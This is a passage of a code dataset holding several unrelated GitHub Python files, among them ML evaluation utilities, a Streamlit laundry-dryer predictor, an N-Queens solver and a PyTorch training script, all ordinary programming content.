\n \tregr = regressor(random_state=1)\n else: \n \tregr = regressor()\n if weights is not None: \n \tregr.fit(X_train.T, c_train[d_,:], sample_weight=weights[d_,:])\n else: \n \tregr.fit(X_train.T, c_train[d_,:])\n predictors[d_] = regr\n return predictors\n\ndef get_regret(predictors,X_train, c_train, X_test, c_test, sp_oracle, quiet=False):\n [d,n_train] = c_train.shape\n c_pred = np.asarray([ predictors[d_].predict(X_train.T) for d_ in range(d)])\n regrets = np.zeros(n_train);x_star_regr = np.zeros(c_pred.shape)\n for i in range(n_train): \n if not quiet: \n if i%500==0: print(i)\n [r_star,x_star] = sp_oracle(c_train[:,i])\n [r_pred,x_pred] = sp_oracle(c_pred[:,i])\n regrets[i] = r_star-r_pred; x_star_regr[:,i]=x_star-x_pred\n return [regrets, x_star_regr]\n\ndef get_regret_instanceDict(predictors, instances, sp_oracle, quiet=False):\n [d,n_train] = c_train.shape\n c_pred = np.asarray([ predictors[d_].predict(X_train.T) for d_ in range(d)])\n regrets = np.zeros(n_train);x_star_regr = np.zeros(c_pred.shape)\n for inst in instances: \n if not quiet: \n if i%500==0: print(i)\n #[r_star,x_star] = sp_oracle(c_train[:,i])\n [r_pred,x_pred] = sp_oracle(c_pred[:,i])\n regrets[i] = instance['opt_val']- instance['c'] @ x_pred; x_star_regr[:,i]=instance['opt_sol']-x_pred\n return [regrets, x_star_regr]\n\ndef get_regret2(predictors,X_train, c_train, X_test, c_test, sp_oracle, quiet=False):\n [d,n_train] = c_train.shape\n c_pred = np.asarray([ predictors[d_].predict(X_train.T) for d_ in range(d)])\n regrets = np.zeros(n_train);x_star_regr = np.zeros(c_pred.shape)\n for i in range(n_train): \n if not quiet: \n if i%500==0: print(i)\n [r_star,x_star] = sp_oracle(c_train[:,i])\n [r_pred,x_pred] = sp_oracle(c_pred[:,i])\n regrets[i] = r_star-r_pred; x_star_regr[:,i]=abs(r_star-r_pred)*np.ones(x_star.shape)\n return [regrets, x_star_regr]\n\ndef eval_regr(c_hat,c_star, oracle): \n # oracle doesn't serialize for parallelization: need to chanage \n [r_star,x_star] = oracle(c_star)\n [r_pred,x_pred] = oracle(c_hat)\n return r_star-r_pred,x_star-x_pred\n\ndef generate_data(n_train, n_test, n_holdout, polykernel_degree,polykernel_noise_half_width,B_true,gen_test=True):\n ''' return X, which is p x N \n '''\n (X_train, c_train) = generate_poly_kernel_data_simple(B_true, n_train, polykernel_degree, polykernel_noise_half_width)\n (X_validation, c_validation) = generate_poly_kernel_data_simple(B_true, n_holdout, polykernel_degree, polykernel_noise_half_width)\n if gen_test: \n (X_test, c_test) = generate_poly_kernel_data_simple(B_true, n_test, polykernel_degree, polykernel_noise_half_width)\n X_test = vcat(ones(1,n_test), X_test)\n # Add intercept in the first row of X\n # X is p x N \n X_train = vcat(ones(1,n_train), X_train); X_validation = vcat(ones(1,n_holdout), X_validation); \n if gen_test: \n \treturn [X_train, c_train,X_validation, c_validation,X_test, c_test]\n else:\n \treturn [X_train, c_train,X_validation, c_validation]\n\n\n\n","repo_name":"angelamzhou/opt-milp-taskloss","sub_path":"deprecated/opt_w_predictions.py","file_name":"opt_w_predictions.py","file_ext":"py","file_size_in_byte":6417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2976193250","text":"import os\nimport sys\nimport numpy as np\nimport scipy.sparse as sp\nfrom scipy.sparse import csr_matrix\nimport xclib\nimport xclib.evaluation.xc_metrics as xc_metrics\nimport xclib.data.data_utils as data_utils\nimport pandas as pd\nfrom tabulate import tabulate\nfrom io import StringIO\nfrom tqdm import tqdm\n\nclass CaptureIO(list):\n def __enter__(self):\n self._stdout = sys.stdout\n sys.stdout = self._stringio = StringIO()\n return self\n def __exit__(self, *args):\n self.append(''.join(self._stringio.getvalue()))\n del self._stringio # free up some memory\n sys.stdout = self._stdout\n\ndef write_sparse_mat(X, filename, header=True):\n if not isinstance(X, csr_matrix):\n X = X.tocsr()\n X.sort_indices()\n with open(filename, 'w') as f:\n if header:\n print(\"%d %d\" % (X.shape[0], X.shape[1]), file=f)\n for y in X:\n idx = y.__dict__['indices']\n val = y.__dict__['data']\n sentence = ' '.join(['%d:%.5f'%(x, v)\n for x, v in zip(idx, val)])\n print(sentence, file=f)\n \ndef read_sparse_mat(filename, use_xclib=True):\n if use_xclib:\n return xclib.data.data_utils.read_sparse_file(filename)\n else:\n with open(filename) as f:\n nr, nc = map(int, f.readline().split(' '))\n data = []; indices = []; indptr = [0]\n for line in tqdm(f):\n if len(line) > 1:\n row = [x.split(':') for x in line.split()]\n tempindices, tempdata = list(zip(*row))\n indices.extend(list(map(int, tempindices)))\n data.extend(list(map(float, tempdata)))\n indptr.append(indptr[-1]+len(tempdata))\n else:\n indptr.append(indptr[-1])\n score_mat = csr_matrix((data, indices, indptr), (nr, nc))\n del data, indices, indptr\n return score_mat\n\nsize_dict = {bool : 1, np.int32 : 4, np.float32 : 4, np.int64 : 8}\n\ndef readbuf(buf, dtype, offset=0, count=1):\n val = np.frombuffer(buf, offset=offset, dtype=dtype, count=count)\n if count == 1: val = val[0]\n offset += size_dict[dtype]*count\n return val, offset\n\ndef read_buf_bin_vecif(buf, dtype, offset = 0, totlen = -1):\n if totlen < 0: totlen, offset = readbuf(buf, np.int64, offset, 1)\n totlen *= 2\n \n temp, _ = readbuf(buf, np.int32, offset, totlen)\n inds = temp.reshape(-1, 2)[:, 0];\n temp, offset = readbuf(buf, dtype, offset, totlen)\n data = temp.reshape(-1, 2)[:, 1];\n \n nr = 1\n if inds.shape[0] > 0: nr = inds.max()+1\n return csr_matrix((data, inds, [0, len(data)]), (1, nr)), offset\n\ndef read_buf_bin_vec(buf, dtype, offset = 0, totlen = -1):\n if totlen < 0: totlen, offset = readbuf(buf, np.int64, offset, 1)\n return readbuf(buf, dtype, offset, totlen)\n\ndef read_buf_bin_spmat(buf, dtype, offset = 0, old = False):\n (nr, nc), offset = readbuf(buf, np.int32, offset, 2)\n \n size = None\n if old: size, offset = read_buf_bin_vec(buf, np.int32, offset, nr)\n else: size, offset = read_buf_bin_vec(buf, np.int32, offset)\n\n data = []; inds = []; indptr = np.zeros(nr+1, int)\n indptr[1:] = size.cumsum()\n totlen = indptr[-1]\n temp, offset = read_buf_bin_vecif(buf, dtype, offset, totlen)\n\n return csr_matrix((temp.data, temp.indices, indptr), (nr, nc)), offset\n\ndef read_bin_spmat(fname, old = False):\n buf = open(fname, 'rb').read()\n print('loaded bin file in buffer')\n spmat, _ = read_buf_bin_spmat(buf, np.float32, 0, old)\n return spmat\n\nclass bcolors:\n purple = '\\033[95m'\n blue = '\\033[94m'\n green = '\\033[92m'\n warn = '\\033[93m' # dark yellow\n fail = '\\033[91m' # dark red\n white = '\\033[37m'\n yellow = '\\033[33m'\n red = '\\033[31m'\n \n ENDC = '\\033[0m'\n bold = '\\033[1m'\n underline = '\\033[4m'\n reverse = '\\033[7m'\n \n on_grey = '\\033[40m'\n on_yellow = '\\033[43m'\n on_red = '\\033[41m'\n on_blue = '\\033[44m'\n on_green = '\\033[42m'\n on_magenta = '\\033[45m'\n \ndef _c(*args, attr='bold'):\n string = ''.join([bcolors.__dict__[a] for a in attr.split()])\n string += ' '.join([str(arg) for arg in args])+bcolors.ENDC\n return string\n\ndef printacc(score_mat, K = 5, X_Y = None, disp = True, inv_prop_ = -1):\n if X_Y is None: X_Y = tst_X_Y\n if inv_prop_ is -1 : inv_prop_ = inv_prop\n \n acc = xc_metrics.Metrics(X_Y.tocsr().astype(np.bool), inv_prop_)\n metrics = np.array(acc.eval(score_mat, K))*100\n df = pd.DataFrame(metrics)\n \n if inv_prop_ is None : df.index = ['P', 'nDCG']\n else : df.index = ['P', 'nDCG', 'PSP', 'PSnDCG']\n \n df.columns = [str(i+1) for i in range(K)]\n if disp: print(tabulate(df.round(2), [\"metric\", *[str(i+1) for i in range(K)]], tablefmt=\"pretty\"))\n return metrics","repo_name":"nilesh2797/zestxml","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4887,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"} +{"seq_id":"21495578946","text":"from sys import stdin\r\n\r\nn, money = map(int, stdin.readline().split())\r\ngraph = [int(stdin.readline()) for _ in range(n)]\r\nfloor = graph[0]\r\nceiling = graph[0]\r\n\r\nfor i in range(1, n):\r\n if ceiling > graph[i]:\r\n s = money // floor\r\n money -= (floor * s)\r\n money += (ceiling * s)\r\n floor = ceiling\r\n ceiling = 0\r\n elif ceiling < graph[i]:\r\n ceiling = graph[i]\r\n\r\n if floor > graph[i]:\r\n floor = graph[i]\r\n\r\nif floor < ceiling:\r\n s = money // floor\r\n money -= (floor * s)\r\n money += (ceiling * s)\r\n\r\nprint(money)","repo_name":"youngeun10/baekjoon","sub_path":"백준/Silver/17521. Byte Coin/Byte Coin.py","file_name":"Byte Coin.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25863194759","text":"# Author : Zhixin.Ji\n# Date : 2019-12-07\n# Description : 命令行参数解析\nimport argparse\n\nbcmd = False\nauthor = ''\nluckey_number = 0\n\nparser = argparse.ArgumentParser(description='命令行参数分析')\nparser.add_argument(\n # 参数名,'-'/'--'前缀表示可选参数,默认变量名是'--'后面的字符串\n '-c', '--b_run_by_cmd',\n # 参数类型,int,float,str,bool等\n # type=bool,\n # 参数储存方式,默认为'store'\n # 'store_true'表示如果有这个参数,就储存为True,且type参数不能赋值\n action='store_true',\n default=False,\n dest='bcmd', # 储存的参数名,默认'--'后面的字符串\n help='是否以命令行启动')\nparser.add_argument('-a', '--author',\n default='未知作者')\nparser.add_argument('-l', '--luckey_number',\n type=int)\n\n# 命令行传参的方式\n# -c\n# 效果: args.bcmd=True, 仅适用于action='store_true'\n# -a sola\n# 效果: args.author=sola\n# -l=2\n# 效果: args.luckey_number=2\n\nargs = parser.parse_args()\nprint(args)\n\nprint('初始值')\nprint('bcmd: ', bcmd)\nprint('author: ', author)\nprint('luckey_number: ', luckey_number)\n\nbcmd = args.bcmd\nauthor = args.author\nluckey_number = args.luckey_number\nprint('显式赋值后')\nprint('bcmd: ', bcmd)\nprint('author: ', author)\nprint('luckey_number: ', luckey_number)\n","repo_name":"solairewrite/PythonTool","sub_path":"py/Demos/cmd_args.py","file_name":"cmd_args.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11816679185","text":"import os\r\nimport cv2\r\nimport numpy as np\r\n\r\n\r\ndef get_xy(img):\r\n '''获取鼠标点击处的坐标值'''\r\n def getpos(event,x,y,flags,param):\r\n if event ==cv2.EVENT_LBUTTONDOWN: #定义一个鼠标左键点击事件\r\n print((x,y),' ',img[y,x])\r\n\r\n cv2.namedWindow('img',0)\r\n cv2.resizeWindow('img',1920,1080)\r\n cv2.imshow('img',img)\r\n cv2.setMouseCallback('img',getpos)\r\n cv2.waitKey(0)\r\n\r\n\r\nif __name__ == '__main__':\r\n # img = cv2.imread(r'./image/009.jpg')\r\n dir = r'../../696'\r\n for name in os.listdir(dir):\r\n img = cv2.imread(os.path.join(dir,name))\r\n get_xy(img)","repo_name":"Yi196/Python","sub_path":"OpenCV/获取像素坐标.py","file_name":"获取像素坐标.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27683673781","text":"\"\"\"\nDerived from: https://github.com/kratzert/finetune_alexnet_with_tensorflow/\n\"\"\"\n\nimport numpy as np\nimport cv2\n\nclass BatchPreprocessor(object):\n# shuffle 拖曳\n def __init__(self,dataset_file_path,num_classes,output_size=[224,224],horizontal_flip=False,shuffle=False,mean_color=[132.2766,139.6506,146.9702],multi_scale=None):\n self.num_classes=num_classes\n self.output_size=output_size\n self.horizontal_flip=horizontal_flip\n self.shuffle=shuffle\n self.mean_color=mean_color\n self.multi_scale=multi_scale\n\n self.pointer=0\n self.images=[]\n self.labels=[]\n\n # Read the dataset file\n dataset_file=open(dataset_file_path)\n # lines=dataset_file.readlines()\n for line in dataset_file.readlines():\n items=line.split()# The items be like :temp/images/image.jpg 0(The last number is labels number)\n self.images.append(items[0])\n self.labels.append(int(items[1]))\n\n # Shuffle the data \n if self.shuffle:\n self.shuffle_data()\n\n def shuffle_data(self):\n images=self.images[:]\n labels=self.labels[:]\n self.images=[]\n self.labels=[]\n\n # use the np.random.permutation to random the image file index\n idx=np.random.permutation(len(labels))\n for i in idx:\n self.images.append(images[i])\n self.labels.append(labels[i])\n\n def reset_pointer(self):\n self.pointer=0\n\n if self.shuffle:\n self.shuffle_data()\n\n def next_batch(self,batch_size):\n # Get next batch of image (path) and labels\n paths=self.images[self.pointer:(self.pointer+batch_size)]\n labels=self.labels[self.pointer:(self.pointer+batch_size)]\n\n # Update pointer\n self.pointer=self.pointer+batch_size\n\n # Read images(RGB)\n images=np.ndarray([batch_size,self.output_size[0],self.output_size[1],3])\n for i in range(len(paths)):\n img=cv2.imread(paths[i])\n\n # Flip image at random if flag is selected\n if self.horizontal_flip and np.random.random()<0.5:\n img=cv2.flip(img,1)\n\n if self.multi_scale is None:\n # Resize image for output\n img=cv2.resize(img,(self.output_size[0],self.output_size[0]))\n img=img.astype(np.float32)\n elif isinstance(self.multi_scale,list):# This function smilar to type ,but this function can check the whether it is subclass or not\n # Resize image for random scale\n new_size=np.random.randint(self.multi_scale[0],self.multi_scale[1],1)[0]# The randint final parameter is mean the size of the random number ,ex:np.random.randint(0,5,1)=4,and the [0] it mean take the np.array out to become the int \n img =cv2.resize(img,(new_size,new_size))\n img=img.astype(np.float32)\n\n # random crop at output size\n diff_size=new_size-self.output_size[0]\n random_offset_x=np.random.randint(0,diff_size,1)[0]\n random_offset_y=np.random.randint(0,diff_size,1)[0]\n img=img[random_offset_x:(random_offset_x+self.output_size[0]),random_offset_y:(random_offset_y+self.output_size)]\n\n # Subtract mean color\n img=img-np.array(self.mean_color)\n\n images[i]=img\n\n # Expand labels to one hot encoding\n one_hot_labels=np.zeros((batch_size,self.num_classes))\n for i in range(len(labels)):\n one_hot_labels[i][labels[i]]=1\n\n # Return array of images and labels\n return images,one_hot_labels\n\n","repo_name":"a8398331994/Deep-learning","sub_path":"examples/vggnet/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22317823054","text":"'''Attribute Association & Relationships'''\nimport streamlit as st\nimport altair as alt\nimport pandas as pd \nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport seaborn as sns\nfrom datetime import datetime\nfrom datetime import date\nfrom PIL import Image\nfrom altair import datum\nimport pickle\n\napptitle = 'Laundry Customer Profiling'\n\ndef app():\n st.markdown('# Predicting Dryer Number using RFC')\n\n # Importing the model and label encoder\n label_encoders = pickle.load(open('./models/le.pkl', 'rb'))\n load_rfc = pickle.load(open('./models/rfc.pkl', 'rb'))\n keys = label_encoders.keys()\n keys = list(keys)\n\n # Declaring input fields\n age_group = st.selectbox('Age Group', ('(25, 30]', '(30, 35]', '(50, 55]', '(45, 50]', '(40, 45]', '(35, 40]'))\n basket_colour = st.selectbox('Basket Colour', ('red', 'green', 'blue', 'black', 'white', 'pink', 'purple', 'yellow', 'brown', 'orange', 'grey', 'unknown'))\n day_of_week = st.selectbox('Day of Week', (0, 1, 2, 3, 4, 5, 6))\n kids_category = st.selectbox('Kids Category', ('young', 'no_kids', 'toddler', 'unknown', 'baby'))\n pants_colour = st.selectbox('Pants Colour', ('black', 'blue_jeans', 'yellow', 'white', 'brown', 'grey', 'orange', 'blue', 'green', 'red', 'purple', 'unknown', 'pink'))\n part_of_day = st.selectbox('Part of Day', ('Evening', 'Night', 'Late Night', 'Early Morning', 'Morning', 'Afternoon'))\n race = st.selectbox('Race', ('malay', 'indian', 'unknown', 'chinese', 'foreigner'))\n shirt_colour = st.selectbox('Shirt Colour', ('blue', 'white', 'red', 'black', 'brown', 'yellow', 'grey', 'orange', 'green', 'purple', 'pink', 'unknown'))\n washer_no = st.selectbox('Washer Number', (3, 6, 4, 5))\n wash_item = st.selectbox('Wash Item', ('clothes', 'unknown', 'blankets'))\n\n\n age_group_stuff = {'(25, 30]': 0, '(30, 35]': 1, '(50, 55]': 2, '(45, 50]': 3, '(40, 45]': 4, '(35, 40]': 5}\n age_group_res = age_group_stuff.get(age_group)\n basket_colour_res = label_encoders['BASKET_COLOUR'].transform([basket_colour])[0]\n day_of_week_res = label_encoders['DAY_OF_WEEK'].transform([day_of_week])[0]\n kids_category_res = label_encoders['KIDS_CATEGORY'].transform([kids_category])[0]\n pants_colour_res = label_encoders['PANTS_COLOUR'].transform([pants_colour])[0]\n part_of_day_res = label_encoders['PART_OF_DAY'].transform([part_of_day])[0]\n race_res = label_encoders['RACE'].transform([race])[0]\n shirt_colour_res = label_encoders['SHIRT_COLOUR'].transform([shirt_colour])[0]\n washer_no_res = label_encoders['WASHER_NO'].transform([washer_no])[0]\n wash_item_res = label_encoders['WASH_ITEM'].transform([wash_item])[0]\n\n predictinputs = [age_group_res, basket_colour_res, day_of_week_res, kids_category_res, pants_colour_res, part_of_day_res, race_res, shirt_colour_res, washer_no_res, wash_item_res]\n prediction = load_rfc.predict([predictinputs])[0]\n prediction_proba = load_rfc.predict_proba([predictinputs])[0]\n prediction = label_encoders['DRYER_NO'].inverse_transform([prediction])[0]\n\n st.info(f\"The predicted dryer is dryer number {prediction}\")\n st.success(f\"\"\"\n The prediction probability for dryer number 7 is : {prediction_proba[0]}\\n\n The prediction probability for dryer number 8 is : {prediction_proba[1]}\\n\n The prediction probability for dryer number 9 is : {prediction_proba[2]}\\n\n The prediction probability for dryer number 10 is : {prediction_proba[3]}\\n\n \"\"\")","repo_name":"TheCornelius/laundryblues","sub_path":"apps/washerclass.py","file_name":"washerclass.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43399557620","text":"#\n# @lc app=leetcode id=51 lang=python3\n#\n# [51] N-Queens\n#\n\n# @lc code=start\nfrom typing import List\n\n## 回溯:对每一行,每个有效可填的位置,填'Q', 直到走完所有行,结果加入结果集,回溯回来,继续下一个试探\nclass Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n res = []\n queen = [['.'] * n for i in range(n)]\n def queen2Str(queen):\n l = []\n for row in queen:\n l.append(''.join(row))\n return l\n\n def isValid(queen, row, col):\n for i in range(row):\n for j in range(n):\n if queen[i][j] == 'Q' and ( j == col or abs(i - row) == abs(j - col)):\n return False\n return True\n\n def backtrack(queen, row):\n if row == n:\n res.append(queen2Str(queen))\n return\n for col in range(n):\n if isValid(queen, row, col):\n queen[row][col] = 'Q'\n backtrack(queen, row + 1)\n queen[row][col] = '.'\n backtrack(queen, 0)\n return res\n\ninput = 4\nprint(Solution().solveNQueens(4)) \n \n# @lc code=end\n\n","repo_name":"CharmSun/my-leetcode","sub_path":"py/51.n-queens.py","file_name":"51.n-queens.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71711711201","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport torch as T\ndevice = T.device(\"cpu\")\nfrom sklearn import preprocessing\n\n\ndef divide_and_extract(arr):\n arr = np.array(arr)\n first_col = arr[:, 0]\n second_col = arr[:, 1]\n third_col = arr[:, 2]\n return np.column_stack((second_col / first_col, third_col))\n\ndef multipy(arr, col1, col2):\n arr = np.array(arr)\n first_col = arr[:, col1]\n second_col = arr[:, col2]\n return first_col*second_col\n\ndef divide(arr, col1, col2):\n arr = np.array(arr)\n first_col = arr[:, col1]\n second_col = arr[:, col2]\n return first_col/second_col\n\ndef add(arr, col1, col2):\n arr = np.array(arr)\n first_col = arr[:, col1]\n second_col = arr[:, col2]\n return first_col+second_col\n\n# -----------------------------------------------------------\n\nclass Samples_Dataset(T.utils.data.Dataset):\n def __init__(self, features_file, targets_file):\n self.features = T.load(features_file).to(device) # rate coefficients\n self.targets = T.tensor(np.load(targets_file), dtype=T.float64\n ).to(device) # densities\n\n # choose number of wanted samples (max 500)\n nsamples = 15\n # get size of last dimension\n size = np.shape(self.features)[-1]\n self.features = self.features[:nsamples,:,:].reshape(-1, size)\n\n tmp_coeff = self.features.detach().numpy()\n\n func1 = multipy(tmp_coeff, col1 = 0, col2 = 1)\n func2 = divide(tmp_coeff, col1 = 0, col2 = 1)\n func3 = add(tmp_coeff, col1 = 0, col2 = 1) \n\n tmp_coeff = np.column_stack((func1,func2, func3, tmp_coeff))\n # Transform back to tensor \n self.features = T.tensor(tmp_coeff, dtype=T.float64).to(device)\n\n # repeat the targets array nsamples times\n self.targets = T.tile(self.targets, (nsamples, 1)).to(device)\n\n \n def __len__(self):\n return len(self.features)\n \n def __getitem__(self, index):\n x = self.features[index] # rate coeff\n y = self.targets[index]\n return x, y\n\n# -----------------------------------------------------------\nclass LoadDataset(T.utils.data.Dataset):\n\n def __init__(self, src_file, nspecies, react_idx = None, m_rows=None, columns= None):\n all_xy = np.loadtxt(src_file, max_rows=m_rows,\n usecols=columns, delimiter=\" \",\n # usecols=range(0,9), delimiter=\"\\t\", delimter= any whitespace by default\n comments=\"#\", skiprows=0, dtype=np.float64)\n\n self.scaler = preprocessing.MinMaxScaler()\n self.scaler_max_abs = preprocessing.MaxAbsScaler() \n\n ncolumns = len(all_xy[0])\n x_columns = np.arange(ncolumns-nspecies,ncolumns,1)\n y_columns = react_idx\n if react_idx == None:\n y_columns = np.arange(0,ncolumns-nspecies,1)\n\n tmp_x = all_xy[:,x_columns] # species\n tmp_y = all_xy[:,y_columns] # rate coefficients\n\n # tmp_y = divide_and_extract(tmp_y) # k2/k1\n\n func1 = multipy(tmp_y, col1 = 0, col2 = 1)\n func2 = divide(tmp_y, col1 = 0, col2 = 1)\n func3 = add(tmp_y, col1 = 0, col2 = 1)\n\n stack = np.column_stack((func1,func2, func3, tmp_y))\n tmp_y = stack\n\n # Normalize data\n self.scaler.fit(tmp_y) \n tmp_y = self.scaler.transform(tmp_y)\n\n self.scaler_max_abs.fit(tmp_x) \n tmp_x = self.scaler_max_abs.transform(tmp_x)\n # print(tmp_y, np.shape(tmp_y))\n\n # Change this back again \n self.x_data = T.tensor(tmp_y, \\\n dtype=T.float64).to(device)\n self.y_data = T.tensor(tmp_x, \\\n dtype=T.float64).to(device)\n self.all_data = T.tensor(all_xy, \\\n dtype=T.float64).to(device)\n\n\n def __len__(self):\n return len(self.x_data)\n \n def __getitem__(self, idx):\n densities = self.x_data[idx,:] # or just [idx]\n coef = self.y_data[idx,:] \n return (densities, coef) # tuple of two matrices \n\n# ------------------------------------------------------------------------------\n\nclass SparseLayer(T.nn.Module):\n def __init__(self, input_size, output_size, connectivity) -> None:\n super(SparseLayer, self).__init__()\n self.in_size = input_size\n self.out_size = output_size\n self.connectivity = connectivity\n self.weight = T.nn.Parameter(T.randn(input_size, output_size))\n \n def forward(self, x):\n # apply sparse connectivity pattern to weight matrix\n x = T.matmul(x, self.weight*self.connectivity) #include .t()?\n return x\n\n# ------------------------------------------------------------------------------\n\nclass Full_ROM(T.nn.Module):\n def __init__(self, input_size, hidden_size):\n super(Full_ROM, self).__init__()\n\n self.connectivity = T.eye(input_size)\n\n self.LinearRegression = SparseLayer(input_size, input_size, self.connectivity)\n \n # set weights outside the diagonal to zero (apply mask)\n self.LinearRegression.weight.data *= self.connectivity\n\n \n self.decoder = T.nn.Sequential(\n T.nn.Linear(input_size, hidden_size),\n T.nn.Tanh(),\n T.nn.Linear(hidden_size, hidden_size),\n T.nn.Tanh(),\n T.nn.Linear(hidden_size, 3),\n )\n\n def forward(self, x):\n encoded = self.LinearRegression(x)\n decoded = self.decoder(encoded)\n return decoded\n\n# ------------------------------------------------------------------------------\n\nclass MyPlots():\n def __init__(self):\n self.epoch_list = []\n self.epoch_loss_list = []\n self.val_loss_list = []\n self.epoch_loss_list_loki = []\n \n def configure(self):\n A = 5 # We want figures to be A5\n plt.figure(figsize=(46.82 * .5**(.5 * A), 33.11 * .5**(.5 * A)))\n\n matplotlib.rc('xtick', labelsize=15) \n matplotlib.rc('ytick', labelsize=15)\n matplotlib.rcParams.update({'font.size': 20}) \n\n def plot_loss_curves(self):\n plt.plot(self.epoch_list, self.epoch_loss_list, '-o', label = 'Loss MSE + L1')\n # plt.plot(self.epoch_list, self.epoch_loss_list_loki, '-o', label = 'LoKI')\n plt.plot(self.epoch_list, self.val_loss_list, '-o', label = 'validation')\n plt.xlabel('epoch')\n plt.ylabel('loss')\n plt.legend()\n plt.savefig('Images\\\\Full_ROM_model\\\\loss_curve.png')\n \n def plot_predict_target(self, predict, target, sort_by_target= False):\n npoints = len(predict)\n x_ = np.arange(0,npoints,1)\n a = target # target\n b = predict # predicted\n ab = np.stack((a,b), axis=-1)\n sorted_ab = ab[ab[:,0].argsort()]\n if (not sort_by_target):\n sorted_ab = ab\n plt.plot(x_, sorted_ab[:,1], 'ro', label='predicted')\n plt.plot(x_, sorted_ab[:,0], 'bo', label= 'target')\n plt.legend()\n\n\n\n#----------------------------------------------------------------------------------------\n\n# Compute norm of network weights\ndef param_norm():\n total_norm = 0\n parameters = [p for p in model.parameters() if p.grad is not None and p.requires_grad]\n for p in parameters:\n param_norm = p.grad.detach().data.norm(2)\n total_norm += param_norm.item() ** 2\n total_norm = total_norm ** 0.5\n return total_norm\n\n#-------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n T.manual_seed(8) # recover reproducibility\n\n # 1. Load training dataset \n src_file = 'data\\\\datapointsk1k2k3_3k.txt' \n species = ['O2(X)', 'O2(a)', 'O(3P)']\n k_columns = [0,1,2] # Set to None to read all reactions/columns in the file\n full_dataset = LoadDataset(src_file, nspecies= len(species), react_idx= k_columns) #(data already scaled)\n nfunctions = 6\n\n dir_path = \"Images\\\\statistics\\\\stacks\\\\500_samples\\\\\"\n samples_dataset = Samples_Dataset(features_file=dir_path+\"stack_train.pt\",\n targets_file=dir_path+\"densities_targets_train.npy\")\n\n # 2. Create neural network\n model = Full_ROM(input_size= nfunctions, hidden_size= 10).to(device)\n model.to(T.double) # set model to float64\n\n # 3. Build training Model\n max_epochs = 200\n ep_log_interval =10\n lrn_rate = 0.01\n l1_coeff = 1e-4\n\n # 4. Choose loss and optimizer\n loss_func = T.nn.MSELoss()\n # loss_mse = T.nn.MSELoss()\n optimizer = T.optim.Adam(model.parameters(), lr=lrn_rate)#, weight_decay=1e-4)\n\n # Split into training and validation sets | samples_dataset -> full_dataset\n train_size = int(0.90 * len(full_dataset))\n test_size = len(full_dataset) - train_size\n train_dataset, val_dataset = T.utils.data.random_split(full_dataset, [train_size, test_size])\n\n # Create minibatch on training set\n bat_size= 20\n train_loader = T.utils.data.DataLoader(train_dataset,\n batch_size=bat_size, shuffle=True) # set to True\n \n # Extract x and y of validation set\n x_val = val_dataset[:][0]\n y_val = val_dataset[:][1]\n\n # Initialize data structures to store info\n myplot = MyPlots() \n\n # 5. Training algorithm\n print(\"Start training\\n\")\n for epoch in range(0, max_epochs):\n epoch_loss = 0 # for one full epoch\n\n model.train() # set mode\n\n for (batch_idx, batch) in enumerate(train_loader):\n (X_batch, Y_batch) = batch # (predictors, targets)\n optimizer.zero_grad() # prepare gradients\n oupt = model(X_batch) # predicted rate coefficient \n # print(np.shape(X_batch))\n # exit()\n loss_val_mse = loss_func(oupt, Y_batch)\n # Add L1 regularization to the first input layer \n loss_val = loss_val_mse #+ l1_loss\n l1_loss = T.tensor(0., requires_grad=True)\n # for param in model.LinearRegression.parameters():\n # l1_loss = l1_loss + T.norm(param, p=1) # p=1 is norm 1\n for name, param in model.named_parameters():\n # if 'bias' not in name:\n l1_loss = l1_loss + T.norm(param, 2)\n loss_val = loss_val_mse + l1_coeff * l1_loss\n epoch_loss += loss_val.item() # accumulate avgs\n loss_val.backward() # compute gradients\n optimizer.step() # update wts\n n_batches = batch_idx+1 # save number of batches\n\n #-------------------------------------------------------------\n # Print and save loss and errors\n if (epoch % ep_log_interval) == 0:\n myplot.epoch_list.append(epoch)\n myplot.epoch_loss_list.append(epoch_loss/n_batches)\n # myplot.epoch_loss_list_loki.append(loss_val_loki.item()/n_batches)\n\n model.eval() # (?)\n prediction = model(x_val)\n # print(np.shape(x_val))\n # exit()\n # loss_val = loss_func(prediction, y_val)\n loss_val = loss_func(prediction, y_val) #+ l1 loss\n myplot.val_loss_list.append(loss_val.item())\n\n print(\"epoch = %4d loss = %0.4f l1_loss= %0.4f validation_loss= %0.4f, param_norm = %0.4f\" % \\\n (epoch, epoch_loss/n_batches, l1_coeff*l1_loss, loss_val.item() ,param_norm()))\n #--------------------------------------------------------------\n\n print(\"Training complete \\n\")\n\n print(\"\\ntotal parameters' norm: \", param_norm())\n\n\n # Iterate through the model parameters and print out their values\n for name, param in model.named_parameters():\n if 'LinearRegression' in name: # Only print encoder parameters\n print(name, T.diagonal(param.data))\n\n # --------------------------------------EVALUATION OF TRAINING SET--------------------------------------------\n model.eval()\n train_predictions = model(train_dataset[:][0]).detach().numpy()\n y_train = train_dataset[:][1].numpy()\n\n # Set matplotlib fig. size, etc...\n myplot.configure()\n\n # Plot loss curves\n myplot.plot_loss_curves()\n\n # Plot densities of training set\n for idx in range(len(train_predictions[0])):\n filename = 'Images\\\\Full_ROM_model\\\\training' + species[idx]+'.png'\n plt.clf()\n a = y_train[:,idx] # target\n b = 